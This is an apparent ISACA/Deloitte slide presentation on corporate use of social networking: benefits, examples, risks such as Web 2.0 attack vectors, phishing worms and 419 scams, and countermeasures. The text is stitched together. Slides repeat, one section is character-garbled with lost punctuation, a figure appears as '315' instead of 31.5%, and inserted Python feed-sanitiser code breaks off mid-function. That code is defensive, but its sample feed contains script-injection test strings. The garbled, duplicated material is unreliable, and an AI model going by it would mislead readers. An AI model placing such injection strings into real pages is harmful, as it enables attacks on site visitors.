• Create better quality deliverables faster by drawing on the collective talents, knowledge and experiences of other employees around the world
Operational efficiencies
• A leading energy company realized approximately $250K in annual cost savings by conducting its employee conference virtually using Social Media
Improved reporting
• A global investment bank tightened reporting cycle times from several weeks to “about 30 seconds” per stakeholder by enabling them to submit their information directly into a team wiki and making that information instantly available to others in a rich dashboard mashup

Increase employee productivity and operational efficiencies (cont.)
• American Red Cross
  – Designed to incite discussions around issues the American Red Cross cares about and describe actions individuals can take (online or offline) to help people prevent, prepare for and respond to emergencies, and give valuable information about preventing, preparing for and responding to emergencies. http://redcrosschat.org

Increase employee productivity and operational efficiencies (cont.)
• Deloitte’s DWiki
  – Provides a safe, flexible knowledge creation and information sharing environment for all Deloitte practitioners across country, practice and Deloitte organizational borders
  – Enhances the client service delivery capabilities of our Deloitte practitioners
  – Serves as a test environment for innovative concepts and solutions which expand the business interests of Deloitte
As used in this document, “Deloitte” means Deloitte LLP. Please see www.deloitte.com/us/about for a detailed description of the legal structure of Deloitte LLP and its subsidiaries.
Foster creativity, innovation and collaboration
• Harness product, process and service innovations by unlocking creativity and ideas from any area of the company
• The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions
• Employees create unexpected connections with one another and expand their base of knowledge, experience and circle of trusted colleagues
Product innovation
• A leading high-tech manufacturer instituted a “submit-and-vote-for-your-favorite-idea” social community with its consumers, generating over 5,000 ideas and over 300,000 votes in its first three months and subsequently identifying new product offerings
Information capture
• A federal agency created an internal wiki to bolster the capture and dissemination of mission-critical information between field agents

Foster creativity, innovation and collaboration (cont.)
• Best Buy
  – A community of Best Buy employees who convene regularly to share knowledge, best practices, frustrations, aspirations and a few jokes. Community members include everyone from recent high school graduates to semi-retirees. https://mix.blueshirtnation.com

Foster creativity, innovation and collaboration (cont.)
• Deloitte’s DStreet
  – Enterprise talent networking site - changing the way we connect with each other
  – Enables another way of collaboration and community building
  – Network, build new relationships and forge successful careers
  – Learn about colleagues and interesting ways to introduce yourself
  – Identify new connection points to create a basis for meaningful conversation
  – A new way of assembling the right team
As used in this document, “Deloitte” means Deloitte LLP. Please see www.deloitte.com/us/about for a detailed description of the legal structure of Deloitte LLP and its subsidiaries.
Enhance customer and partner relationships
• Opens the lines of communication beyond typical spokespeople such as marketing, sales and PR, and provides an avenue for other important stakeholders (e.g. engineers, scientists, product managers) to gather firsthand feedback from customers
• Allow customers to access help beyond traditional means, with networks that provide peer support and a user-generated knowledgebase, while monitoring customer perception
• Provide a forum for collaborative business development, education and communications with vendors, OEMs and other partners
• Allow consumers who know your products and services best to become a part of the new offering development process
Revenue growth
• A major consumer goods company improved sales by 315 by including customer ratings, user-generated product reviews and other social features on its online storefront, also resulting in a 40% uptick in average order value

Enhance customer and partner relationships (cont.)
• Procter & Gamble
  – Capessa launched in the “Yahoo Health” section of Yahoo.com, one of the world's leading internet destinations. Women who register with Capessa.yahoo.com have access to several topic areas, including parenting, pregnancy, weight loss, relationships, career, healthy living and care giving. http://realwomenrealadvice.com

Enhance customer and partner relationships (cont.)
• American Express
  – OPEN Forum, an online resource and networking site for business owners. The site is designed to forge meaningful business connections and provide practical, actionable information and insights from influential bloggers, industry leaders and savvy entrepreneurs. http://www.openforum.com

Enhance customer and partner relationships (cont.)
• State of Louisville, Kentucky
  – Interactive audit findings on Web site. Allows the users to discuss previous audit findings. http://www.louisvilleky.gov/InternalAudit

Enhance customer and partner relationships (cont.)
• Amazon
  – A social network for people who love books. Users are able to create a virtual shelf to show off their books, see what their friends are reading and discover new books. http://www.shelfari.com

Enhance customer and partner relationships (cont.)
• Bank of America (BofA)
  – On January 29, 2010, the Bank of America Web site was down. BofA used Twitter to keep in touch with its customers and let them know the latest update.
Risks and challenges

Risks and challenges
• Farmers and Mobsters
  – Top Facebook Applications

Rank  Name                    Monthly Active Users
1     FarmVille               82,580,911
2     Static FBML             46,827,021
3     Birthday Cards          41,904,049
4     Café World              30,032,716
5     Facebook for iPhone     29,438,848
6     Texas HoldEm Poker      28,332,917
7     Slide FunSpace          25,630,033
8     Happy Aquarium (BETA)   24,915,971
9     Mafia Wars              24,704,179
10    Causes                  24,317,292

• Source: http://statistics.allfacebook.com/applications/leaderboard (March 2010)
• There are now more than 500,000 active applications on the Facebook Platform
Risks and challenges (cont.)
• New security concerns and attack vectors — as a result of the shift in technology through Web services that are empowering server-side core technology components, as well as Asynchronous JavaScript and XML (“AJAX”) and Rich Internet Application (“RIA”) clients that are enhancing client-end interfaces in the browser itself
• Top 10 Web 2.0 Attack Vectors — http://net-square.com/whitepapers/Top10_Web20_AV.pdf
  – Cross-site scripting (“CSS”) in AJAX, e.g. “Samy worm that exploited MySpace.com’s CSS flaw”
  – XML poisoning — poison XML blocks coming from AJAX client
  – Malicious AJAX code execution — replay of cookies for each request
  – RSS/Atom injection — inject JavaScripts into the RSS feeds to generate attack on client browser
  – Web Services Definition Language (“WSDL”) scanning and enumeration
  – Client-side validation in AJAX routines — fail to perform server-side checks
  – Web services routing issues — compromise of intermediate nodes
  – Parameter manipulation with SOAP — web services consume information and variables from SOAP
  – XPATH injection in SOAP message — bypass authentication mechanisms
  – RIA thick client binary manipulation — issues with session management
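The RSS/Atom injection vector in the list above concerns feed content that carries script into the reader's browser; the syndication and mashup slides earlier show why feeds are pulled from many sources and re-rendered. The following Python is an added example (not code from the presentation or from the Net-Square paper it cites) of the defensive counterpart: a feed reader that parses a constructed RSS 2.0 document with the standard library and strips script bodies, event-handler attributes and non-http(s) links from item descriptions before they are rendered. The sample feed, the example.com URLs and the tag and attribute allow-lists are assumptions for illustration.

```python
"""Added example: sanitise syndicated (RSS) content before rendering it.
The feed below is constructed for illustration; URLs are placeholders."""
import html
import xml.etree.ElementTree as ET  # for feeds from untrusted sources prefer defusedxml.ElementTree
from html.parser import HTMLParser

# Allow-list: what this reader is willing to render from a description.
ALLOWED_TAGS = {"p", "b", "i", "em", "strong", "a", "ul", "ol", "li", "br"}
ALLOWED_ATTRS = {"a": {"href"}}     # every kept attribute is a URL, so it is scheme-checked
# Elements whose text content must be dropped as well as the tag itself.
DROP_CONTENT = {"script", "style", "iframe", "object", "noscript", "svg", "math"}
# Void elements never get a closing tag, so they must not affect nesting depth.
VOID = {"br", "img", "hr", "input", "meta", "link", "area", "base", "col",
        "embed", "source", "track", "wbr", "param"}
SAFE_SCHEMES = ("http://", "https://")


def safe_link(url):
    """Return the URL only if it uses http(s); javascript:, data: etc. become ''."""
    cleaned = (url or "").strip()
    return cleaned if cleaned.lower().startswith(SAFE_SCHEMES) else ""


class FeedHtmlSanitizer(HTMLParser):
    """Rebuilds an HTML fragment keeping only allow-listed tags and attributes.
    Unknown tags are unwrapped (their text survives), DROP_CONTENT tags lose
    their text too, and all text is re-escaped on the way out."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0          # > 0 while inside a DROP_CONTENT element

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return                   # unwrap: the tag is dropped, its content kept
        kept = ""
        for name, value in attrs:
            if name in ALLOWED_ATTRS.get(tag, set()) and safe_link(value):
                kept += ' %s="%s"' % (name, html.escape(safe_link(value), quote=True))
        self.out.append("<%s%s>" % (tag, kept))

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            if self.skip_depth:
                self.skip_depth -= 1
            return
        if self.skip_depth or tag in VOID or tag not in ALLOWED_TAGS:
            return
        self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(html.escape(data, quote=False))
    # comments, doctypes and processing instructions hit the no-op defaults and vanish


def sanitize_html(fragment):
    parser = FeedHtmlSanitizer()
    parser.feed(fragment or "")
    parser.close()
    return "".join(parser.out)


# Constructed feed: one item whose description mixes legitimate markup with
# a script block, an event-handler attribute and a javascript: link.
SAMPLE_FEED = """<?xml version="1.0"?>
<rss version="2.0"><channel><title>Constructed sample feed</title>
<item>
<title>Quarterly update &lt;script&gt;</title>
<link>http://example.com/update</link>
<description><![CDATA[<p>Read the <a href="http://example.com/report">report</a>.</p>
<script>alert('injected')</script>
<p onmouseover="alert(1)">Hover <b>here</b></p>
<a href="javascript:alert(1)">click</a>]]></description>
</item>
</channel></rss>"""


def load_feed(xml_text):
    """Parse an RSS 2.0 document and return items that are safe to render."""
    root = ET.fromstring(xml_text)
    items = []
    for item in root.iter("item"):
        items.append({
            "title": html.escape(item.findtext("title", ""), quote=False),
            "link": safe_link(item.findtext("link", "")),
            "description": sanitize_html(item.findtext("description", "")),
        })
    return items


if __name__ == "__main__":
    for entry in load_feed(SAMPLE_FEED):
        print(entry["title"], entry["link"])
        print(entry["description"])
```

The design choice worth noting is the allow-list: rather than trying to recognise every way script can be smuggled into markup, the reader names the few tags and the single attribute it needs and re-escapes everything else, which is what makes the script tag, the `onmouseover` handler and the `javascript:` href disappear without a per-attack rule. Parsing the feed XML itself with `xml.etree` is adequate for this illustration; a reader that accepts feeds from arbitrary sites should parse with `defusedxml` to limit entity-expansion abuse.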
Risks and challenges (cont.)
• Example worms / phishing attacks affecting social networking sites
  – Koobface – targets Facebook, MySpace, hi5, Bebo, Twitter and other sites. Users are prompted to click on a URL purporting to be an update from Adobe, and a worm is downloaded to the PC which looks for personal data.
  – Fbaction – Facebook phishing attack that encourages users to sign up for fbaction.net using their Facebook credentials. Those credentials are then used to hijack the Facebook account.

Risks and challenges (cont.)
  – Boface – convinces users to click on a link pointing to a video, resulting in a download. Shortly after the download is complete, the user’s Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends.
• Common element – they all take advantage of the implied trust that social networking users have with each other

Risks and challenges (cont.)
“Has what we've learned about writing software the last 20 years been expressed in the design of Web 2.0? Of course not. It can't even be said to have a design. If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming, Web 2.0 would not be happening.” – Marcus Ranum in InfoSec Magazine, May 2008
• Trust — Data reliability commonly causes issues for social media in the workplace. The Web has partially solved this with techniques such as inbound link counting, but reputation and voting systems are starting to appear, often as plug-ins for social media tools
• May also take advantage of URL shortening – bit.ly, tr.im, tinyurl.com, etc.
Risks and challenges (cont.)
• More on phishing — social networks are a target-rich environment

Risks and challenges (cont.)
• More on phishing — social networks are a target-rich environment (cont.)
“Dearest One…
Sorry for the nature of this email, please bear with me.
I am Natasha Kone, a 22 year old lady now. I was born on the 1st of January 1986 to the family of Kone. My father’s name is Kamara Cone. He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively. I am their only child. When I was a kid I attended a private school and things were well for me and my parents. Things changed when I was in High School; my mother died on the 21st October 1994. My father then took me very special and gave me motherly care. As fate had it my father died last year……” – See http://www.419legal.org for more details
• The 419 scams have evolved with the technology – now using LinkedIn to target specific individuals
Risks and challenges (cont.)
• Reputation — Damage to company brand/reputation through inappropriate comments or remarks from employees
  – Even a lack of a response may damage the brand. For example, XYZ Company Inc. creates a Twitter account called XYZ_Cares and then fails to use the account
  – Other examples include creating a social media program but not telling the rest of the company about it, so they may be unaware of any promotions or offers being publicized
• Copyright violation — Third-party material such as essays, articles and photographs are used without written consent from the proprietor
• Intellectual Property theft — Harder to prevent inadvertent data leakage through the one-to-many nature of Web 2.0 as a medium

Risks and challenges (cont.)
• Failures in the use of Social Media — most companies that use Social Media don’t approach it the way they would with other mission-critical technology
  – At best it can be said that most companies today are merely dabbling with Social Media…
  – Few have approached the solution with an integrated strategy or a concrete business case, usually because they either aren’t fully convinced of its value or have been slowed by the security and legal issues
  – Without a strategy and proper metrics based on a business case, their projects will remain small, mismanaged and likely to fail
“Fully half of all Social Media investments will fail” — Gartner

Risks and challenges (cont.)
“When I discovered YouTube, I didn't work for five days. I did nothing. I viewed ‘cookie monster sings chocolate rain’ about 1000 times.” – Michael Scott from The Office
• Productivity — Users employ social media tools for nonproductive purposes such as socializing (“Social Notworking”)
http://news.bbc.co.uk/2/hi/business/8325865.stm
Risks and challenges (cont.)
• Technical Integration — Most organizations note that integration between individual Web 2.0 applications and their overall infrastructure is a major concern
  – Sign in using your account with: Facebook, Twitter, Myspace, Yahoo, Google, Windows Live ID, AOL, Blogger, WordPress, Netlog, OpenID, flickr

Risks and challenges (cont.)
• Information hoarding — In many industries value is placed on what an employee knows that others do not know. This belief prevents data sharing
• Quantification — Researchers currently face challenges quantifying social networking benefits
  – Valuation techniques include, among others, Beckstrom’s law, which states that — “The value of a network equals the net value of each user’s transactions conducted through that network, valued from the perspective of each user and summed for all”
  Or alternatively:
  – http://en.wikipedia.org/wiki/Beckstrom's_law

Risks and challenges (cont.)
• Litigation issues — Discrimination, defamation, violation of privacy and harassment are some of the potential concerns that might result in litigation issues
A quick word on privacy
“People have really gotten comfortable not only sharing more information and different kinds, but more openly and with more people. That social norm is just something that has evolved over time.”
— Mark Zuckerberg, Facebook founder
“If you have something that you don’t want anyone to know, maybe you shouldn’t be doing it in the first place.”
— Eric Schmidt, CEO, Google Inc.

A quick word on privacy (cont.)
• Loss of Fourth Amendment protection
• Encryption of data storage unlikely
• Lack of encryption while data in use
• Data remanence: limited attempt to address
Responding to the risks and challenges
• Policies and procedures
  – Acceptable use policy
    • Details how social networking sites and applications can be used
    • Define consequences for failure to comply, e.g. “termination of employment and legal action”
• Risk assessment
  – Establish what information is most critical to the business
  – Understand how information might become vulnerable and how to protect it (data mapping)

Responding to the risks and challenges
• Education and awareness
  – Inform users of the information security risks involved and how to guard against them
    • For example, only install or run applications from trusted sources approved by the corporate IT department

Responding to the risks and challenges (cont.)
• Vulnerability Assessments
  – Identifying, quantifying and prioritizing the potential vulnerabilities that Social Networking may present to the organization
• Firewalls
  – Historically, firewalls focused on ports, IP addresses and packets
  – But social networking applications operate on ports 80 & 443
  – Next-generation firewall technology that offers granular control of social networking functionality:
    • Identify applications regardless of port, protocol, evasive tactic or SSL
    • Identify users regardless of IP address
    • Scan application content in real time
    • Visibility and policy control over application access
What is next in the world of social networking

Where we are at today
• Enterprise Social Media has crossed the tipping point and is no longer considered an “emerging” technology
“The Hype Cycle” http://en.wikipedia.org/wiki/Hype_cycle

What’s next in the world of social networking
• Increase in the use of mobile devices to access Social Networks
  – Over 600 million people will use their phone to access Social Networks by 2013, an increase of more than 400% on the 2009 figure of 140 million. Source — eMarketer
• Increase in frequency of access
  – Facebook mobile users are 50% more active than other users of the site
• Take your social profile with you as you travel the Web
  – For example — Facebook Connect
• Social Networks will become more pervasive — broadcasting your location in geo-networking apps
  – Interaction between devices. For example, your car’s navigation system will be able to learn your friend’s location and provide directions to them

Some further predictions
• Some quotes on social networks
  – “Probably the greatest transformative force in our generation, absent a major war” — Mark Zuckerberg, Facebook founder
  – “(Twitter is)… something important that has the potential to change the world, though we have a long way to go” — Biz Stone, Co-founder of Twitter

Q&A

Today’s Presenters
Nelson Gibbs
Senior Manager
AERS – Audit & Enterprise Risk Services
Deloitte & Touche LLP
ngibbs@deloitte.com
+1 213 593 4241

Appendix
• Additional resources
  – Gopal, Raj et al., “Web 2.0 reinvents corporate networking”, Deloitte Consulting LLP (2008)
  – The Economist — A special report on social networking, “January 30, 2010”
  – Fraser, Matthew; Dutta, Soumitra (2008). Throwing Sheep in the Boardroom: How Online Social Networking Will Transform Your Life, Work and World
  – “Wall of Facebook: The Social Network's Plan to Dominate the Internet — and Keep Google Out” by Fred Vogelstein, Wired Magazine (June 2009). http://www.wired.com/techbiz/it/magazine/17-07/ff_facebookwall
  – “The Future is Social, Not Search, Facebook COO Says” by Ryan Singel, Wired Magazine (October 2009). http://www.wired.com/epicenter/2009/10/facebook-social-2
  – British Computer Society Social Media Web site — http://www.bcs.org/socialmedia
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg3
Definitions and terminologyDefinitions and terminology
wwwisacaorg4
Social network Social network mdashmdash Some definitionsSome definitions
bull As defined in Wikipediandash A social network is a social structure made
of nodes (which are generally individuals or organizations) that are tied by one or more specific types of interdependency such as values visions ideas financial exchange friendship kinship dislike conflict or trade The resulting structures are often very complex
bull As defined in Webmasterndash Social networking is a phenomena defined by linking people to each
other in some way Digg is a popular example of a social network (using social bookmarking) Users work together to rate news and are linked by rating choices or explicit identification of other members Generally social networks are used to allow or encourage various types of activity whether commercial social or some combination of the two
wwwisacaorg5
What makes a Social Network so powerfulWhat makes a Social Network so powerful
bull Metcalfersquos lawndash The value of a telecommunications network is proportional to
the square of the number of connected users of the system (n2)
bull Related to the fact that the number of unique connections in a network of a number of nodes (n) can be expressed mathematically as the triangular number n(nndash1)2 which is proportional to n2 asymptoticallyhttpenwikipediaorgwikiMetcalfersquos_Law
bull Applying this to Social Networking mdash Consider LinkedIn mdashit took 16 months to reach the first one million users The latest million users were added in just 11 days
wwwisacaorg6
What makes a Social Network so powerful What makes a Social Network so powerful (cont)(cont)
bull Web 20ndash ldquoWeb 20rdquo was first coined in 1999 and by 2004 had become used to describe the
next evolution of the Web ndash Itrsquos based on the notion that people who consume media access the Internet and use
the Web shouldnrsquot passively absorb the flow of content from provider to viewer rather they should be active contributors helping customize media and technology for their own purposes
ndash Social network sites blogs wikis and other collaborative technologies are the result
Web 10 (Yesterday)
Power lies with institutionsplatforms and technologybull Structuredbull Siloedbull One size fits allbull Passive audiencebull Unilateral
Web 20 (Today)
Power lies with userscommunities and experiencesbull Flexiblebull Collaborativebull Communitiesbull Engaged usersbull Multilateral
wwwisacaorg7
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Mapping and measuring of relationships and flows among people groups organizations computers or other information knowledge processing entities
bull The nodes in the network are the people and groups while the links show relationships or flows between the nodes
bull Provides both a visual and a mathematical analysis of human relationships
Social network analysis
Slide 8: Social network — More terminology (cont)

Blogs
• Web sites where entries are made (such as in a journal or diary) and displayed in reverse chronological order; they often provide commentary or news on a particular subject.
• Some function as personal online diaries or logbooks.
• Combine text, images and links to other blogs and Web sites.
• Typically provide archives in calendar form, local search, syndication feeds, reader comment posting, trackback links from other blogs, blogroll links to other recommended blogs, and categories of entries tagged for retrieval by topic.
Slide 9: Social network — More terminology (cont)

Microblogging
• Short, frequent posts with questions, information or current status.
• Twitter (public) and Yammer (private) are two examples.
• Social software (including Facebook, LinkedIn and MySpace) now prompts for "what's on your mind" or similar status or mood lines.
Slide 10: Social network — More terminology (cont)

Wikis
• Web sites which allow users to easily add, remove, edit and change most available content.
• Effective for collaborative writing and self-service Web site creation and maintenance.
Slide 11: Social network — More terminology (cont)

Wikis (cont)
• Wikipedia – perhaps the best known wiki
  – Launched on 15 January 2000
  – First edit on 16 January, followed by 1,000 articles in the first month
  – Now has 17 million articles in 270 languages, all written by volunteers
  – Billionth edit took place on 16 April 2010
  – Used by 400 million people every month
  – Claims to have 80,000 editors, although reports suggest that it has recently lost thousands, something Wikipedia disputes
  – Aims to grow to one billion users by 2015, with a focus on women and people in the developing world
  – Critics maintain that many entries are untrustworthy
  – But a disputed study has shown that for subjects such as science it comes as close as traditional encyclopedias
Statistics taken from http://www.bbc.co.uk/news/technology-12171977
Slide 12: Social network — More terminology (cont)

Social networking software
• A range of tools which facilitate social networking.
• Personal Web pages including bios, photos, interests, audio and video, links to friends, messages from friends and personal networks.
Slide 13: Social network — More terminology (cont)

Social networking software (cont)
• Facebook – the biggest of them all
  – Over 500 million registered users
  – 50% of our active users log on to Facebook in any given day
  – About 70% of Facebook users are outside the US
  – More than 30 billion pieces of content (web links, news stories, blog posts, notes, photo albums, etc.) shared each month
  – People spend over 700 billion minutes per month on Facebook
Statistics taken from http://www.facebook.com/press/info.php?statistics (Sept 2010)
• As of March 13, 2010, Facebook was America's most popular site according to Experian Hitwise, with 7.1% of traffic compared to Google's 7.0%.
Slide 14: Social network — More terminology (cont)

Social bookmarking and tagging
• Sites which allow users to share links to sites with others.
• Tags are metadata which classify content into categories.
• Can be used to aid searches, create tag clouds and link disparate sources.
Slide 15: Social network — More terminology (cont)

Syndication and mashups
• Using feeds available from a Web site to provide an updated list of its content, in the form of a subscription, an embedded portion of a Web site, or a collection of disparate content on a particular topic.
• RSS (Really Simple Syndication) or Atom syndication, with .rss, .xml or .rdf files used for the feeds.
• Mashups combine data and feeds from multiple sources to provide a single integrated set of information, e.g. data plotted on a map.
Slide 16: Social network — More terminology (cont)

Videos and photos
• Online collections of videos and photos from users.
• Users can upload, tag and rate content.
Slide 17: Social Networking Companies

Social Media – Popular Examples
Wikis: Wikitravel, Wikipedia, wikiHow, WikiBooks, the TV IV
Blogs: livejournal, WordPress, Blogger, Technorati, xanga
Social Networking: myspace.com, LinkedIn, facebook, friendster, plaxo
RSS (Really Simple Syndication): newsgator, Bloglines, iGoogle, FeedBurner
Presence and Microblogging: twitter, Pownce, jaiku, Hictu, tumblr
Social Bookmarking and Tagging: delicious, digg, reddit, newsvine, StumbleUpon
Online Photo and Video Sharing: YouTube, flickr, shutterfly, last.fm, slideshare
Slide 18: Why and how companies are using social networking
Slide 19: Statistics on companies using Social Networking

Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies: US = 29 companies, Europe = 48 companies, Asia-Pacific = 20 companies, Latin America = 3 companies.
Source: http://www.burson-marsteller.com/Innovation_and_insights/blogs_and_podcasts/BM_Blog/Documents/Burson-Marsteller%202010%20Global%20Social%20Media%20Check-up%20white%20paper.pdf
Slide 20: Statistics on companies using Social Networking (cont)
Slide 21: Companies typically adopt Social Media for three major benefits

1. Increase employee productivity and operational efficiencies
2. Foster creativity, innovation and collaboration
3. Enhance customer and partner relationships
Slide 22: Increase employee productivity and operational efficiencies

• Creates a lightweight institutional memory system for a company's intellectual assets to be easily captured, stored and accessed.
• Reduce the net volume of e-mail and allow users to "pull" information at their convenience, as opposed to spending time reading through a mass e-mail chain.
• Create better quality deliverables faster by drawing on the collective talents, knowledge and experiences of other employees around the world.

Operational efficiencies
• A leading energy company realized approximately $250K in annual cost savings by conducting its employee conference virtually using Social Media.

Improved reporting
• A global investment bank tightened reporting cycle times from several weeks to "about 30 seconds" per stakeholder by enabling them to submit their information directly into a team wiki and making that information instantly available to others in a rich dashboard mashup.
Slide 23: Increase employee productivity and operational efficiencies (cont)

• American Red Cross
  – Designed to incite discussions around issues the American Red Cross cares about and describe actions individuals can take (online or offline) to help people prevent, prepare for and respond to emergencies, and give valuable information about preventing, preparing for and responding to emergencies. http://redcrosschat.org
Slide 24: Increase employee productivity and operational efficiencies (cont)

• Deloitte's DWiki
  – Provides a safe, flexible knowledge creation and information sharing environment for all Deloitte practitioners across country, practice and Deloitte organizational borders
  – Enhances the client service delivery capabilities of our Deloitte practitioners
  – Serves as a test environment for innovative concepts and solutions which expand the business interests of Deloitte

As used in this document, "Deloitte" means Deloitte LLP. Please see www.deloitte.com/us/about for a detailed description of the legal structure of Deloitte LLP and its subsidiaries.
Slide 25: Foster creativity, innovation and collaboration

• Harness product, process and service innovations by unlocking creativity and ideas from any area of the company.
• The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions.
• Employees create unexpected connections with one another and expand their base of knowledge, experience and circle of trusted colleagues.

Product innovation
• A leading high-tech manufacturer instituted a "submit-and-vote-for-your-favorite-idea" social community with its consumers, generating over 5,000 ideas and over 300,000 votes in its first three months and subsequently identifying new product offerings.

Information capture
• A federal agency created an internal wiki to bolster the capture and dissemination of mission-critical information between field agents.
Slide 26: Foster creativity, innovation and collaboration (cont)

• Best Buy
  – A community of Best Buy employees who convene regularly to share knowledge, best practices, frustrations, aspirations and a few jokes. Community members include everyone from recent high school graduates to semi-retirees. https://mix.blueshirtnation.com
Slide 27: Foster creativity, innovation and collaboration (cont)

• Deloitte's DStreet
  – Enterprise talent networking site, changing the way we connect with each other
  – Enables another way of collaboration and community building
  – Network, build new relationships and forge successful careers
  – Learn about colleagues and interesting ways to introduce yourself
  – Identify new connection points to create a basis for meaningful conversation
  – A new way of assembling the right team

As used in this document, "Deloitte" means Deloitte LLP. Please see www.deloitte.com/us/about for a detailed description of the legal structure of Deloitte LLP and its subsidiaries.
Slide 28: Enhance customer and partner relationships

• Opens the lines of communication beyond typical spokespeople such as marketing, sales and PR, and provides an avenue for other important stakeholders (e.g. engineers, scientists, product managers) to gather firsthand feedback from customers.
• Allow customers to access help beyond traditional means, with networks that provide peer support and a user-generated knowledgebase, while monitoring customer perception.
• Provide a forum for collaborative business development, education and communications with vendors, OEMs and other partners.
• Allow consumers who know your products and services best to become a part of the new offering development process.

Revenue growth
• A major consumer goods company improved sales by 31.5% by including customer ratings, user-generated product reviews and other social features on its online storefront, also resulting in a 40% uptick in average order value.
Slide 29: Enhance customer and partner relationships (cont)

• Procter & Gamble
  – Capessa launched in the "Yahoo! Health" section of Yahoo.com, one of the world's leading internet destinations. Women who register with Capessa.yahoo.com have access to several topic areas, including parenting, pregnancy, weight loss, relationships, career, healthy living and care giving. http://realwomenrealadvice.com
Slide 30: Enhance customer and partner relationships (cont)

• American Express
  – OPEN Forum, an online resource and networking site for business owners. The site is designed to forge meaningful business connections and provide practical, actionable information and insights from influential bloggers, industry leaders and savvy entrepreneurs. http://www.openforum.com
Slide 31: Enhance customer and partner relationships (cont)

• State of Louisville, Kentucky
  – Interactive audit findings on Web site. Allows the users to discuss previous audit findings. http://www.louisvilleky.gov/InternalAudit
Slide 32: Enhance customer and partner relationships (cont)

• Amazon
  – A social network for people who love books. Users are able to create a virtual shelf to show off their books, see what their friends are reading and discover new books. http://www.shelfari.com
Slide 33: Enhance customer and partner relationships (cont)

• Bank of America (BofA)
  – On January 29, 2010, Bank of America's Web site was down. BofA used Twitter to keep in touch with its customers and let them know the latest update.
Slide 34: Risks and challenges
Slide 35: Risks and challenges

• Farmers and Mobsters
  – Top Facebook Applications
• Source: http://statistics.allfacebook.com/applications/leaderboard (March 2010)
• There are now more than 500,000 active applications on the Facebook Platform

Rank – Name – Monthly Active Users
1. FarmVille – 82,580,911
2. Static FBML – 46,827,021
3. Birthday Cards – 41,904,049
4. Café World – 30,032,716
5. Facebook for iPhone – 29,438,848
6. Texas HoldEm Poker – 28,332,917
7. Slide FunSpace – 25,630,033
8. Happy Aquarium (BETA) – 24,915,971
9. Mafia Wars – 24,704,179
10. Causes – 24,317,292
Slide 36: Risks and challenges (cont)

• New security concerns and attack vectors — as a result of the shift in technology through Web services that are empowering server-side core technology components, as well as Asynchronous JavaScript and XML ("AJAX") and Rich Internet Application ("RIA") clients that are enhancing client-end interfaces in the browser itself.
• Top 10 Web 2.0 Attack Vectors — http://net-square.com/whitepapers/Top10_Web20_AV.pdf
  – Cross-site scripting ("CSS") in AJAX, e.g. "Samy worm that exploited MySpace.com's CSS flaw"
  – XML poisoning — poison XML blocks coming from the AJAX client
  – Malicious AJAX code execution — replay of cookies for each request
  – RSS/Atom injection — inject JavaScript into the RSS feeds to generate an attack on the client browser
  – Web Services Definition Language ("WSDL") scanning and enumeration
  – Client-side validation in AJAX routines — failure to perform server-side checks
  – Web services routing issues — compromise of intermediate nodes
  – Parameter manipulation with SOAP — web services consume information and variables from SOAP
  – XPATH injection in SOAP message — bypass authentication mechanisms
  – RIA thick client binary manipulation — issues with session management
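Two of the vectors above, XML poisoning and RSS/Atom injection, can be closed by the consuming side of a mashup (slide 15) before feed content reaches a browser. The following Python is an added example, not from the slides or the Net-Square paper: it refuses any feed carrying a DTD and reduces each entry to inert, escaped text with only http(s) links. The sample feeds, hostnames and element handling are constructed assumptions.

```python
"""Added example (not from the slides): a defensive consumer for
third-party RSS/Atom feeds used in a mashup. Two of the listed
Web 2.0 vectors are handled: XML poisoning (refuse any feed that
declares a DTD) and RSS/Atom injection (reduce entry content to
inert escaped text and drop non-http links)."""
import html
import re
import xml.etree.ElementTree as ET
from typing import List, Optional

# A syndication feed never needs a DTD; any DOCTYPE/ENTITY declaration
# is refused before the bytes reach the XML parser.
DTD_MARKER = re.compile(rb"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)
# Active elements are removed together with their bodies ...
ACTIVE_BLOCK = re.compile(
    r"<\s*(script|style|iframe|object|embed)\b.*?<\s*/\s*\1\s*>",
    re.IGNORECASE | re.DOTALL)
# ... then every remaining tag is stripped, leaving text only.
ANY_TAG = re.compile(r"<[^>]*>")
SAFE_SCHEMES = ("http://", "https://")


def feed_is_poisoned(raw: bytes) -> bool:
    """True when the document declares a DTD or entities (XML poisoning)."""
    return DTD_MARKER.search(raw) is not None


def sanitize_html(fragment: Optional[str]) -> str:
    """Turn untrusted feed markup into plain text that is inert wherever
    it is inserted: drop active elements, strip tags, normalise entities,
    then escape. The final escape is the guarantee; tag stripping only
    removes noise."""
    text = ACTIVE_BLOCK.sub("", fragment or "")
    text = ANY_TAG.sub("", text)
    return html.escape(html.unescape(text), quote=True)


def safe_link(url: Optional[str]) -> Optional[str]:
    """Keep only plain web URLs; javascript:, data: and friends become None."""
    if not url:
        return None
    url = url.strip()
    return url if url.lower().startswith(SAFE_SCHEMES) else None


def _local(tag: str) -> str:
    """Strip an XML namespace so RSS and Atom elements match by local name."""
    return tag.rsplit("}", 1)[-1]


def _child_text(node: ET.Element, *names: str) -> str:
    for child in node:
        if _local(child.tag) in names:
            return child.text or ""
    return ""


def _child_link(node: ET.Element) -> str:
    """RSS puts the URL in <link> text, Atom in <link href="..."/>."""
    for child in node:
        if _local(child.tag) == "link":
            return child.text or child.get("href", "")
    return ""


def sanitize_feed(raw: bytes) -> List[dict]:
    """Parse an RSS 2.0 or Atom feed and return render-safe entries."""
    if feed_is_poisoned(raw):
        raise ValueError("feed rejected: DTD or entity declaration present")
    root = ET.fromstring(raw)
    entries = []
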